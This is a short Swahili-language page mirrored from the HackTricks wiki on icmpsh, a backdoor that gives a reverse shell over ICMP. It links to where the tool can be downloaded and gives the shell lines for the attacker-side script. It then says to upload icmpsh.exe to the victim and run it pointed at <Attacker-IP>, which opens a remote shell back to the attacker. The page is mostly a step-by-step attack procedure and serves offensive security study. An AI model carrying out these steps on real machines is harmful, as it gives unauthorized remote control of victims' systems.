mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
660 B
660 B
{{#include ../banners/hacktricks-training.md}}
Pakua backdoor kutoka: https://github.com/inquisb/icmpsh
Upande wa mteja
Tekeleza script: run.sh
Ikiwa unapata makosa, jaribu kubadilisha mistari:
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
Kwa:
echo Please insert the IP where you want to listen
read IP
Upande wa Mwathirika
Pakia icmpsh.exe kwa mwathirika na uendeshe:
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
{{#include ../banners/hacktricks-training.md}}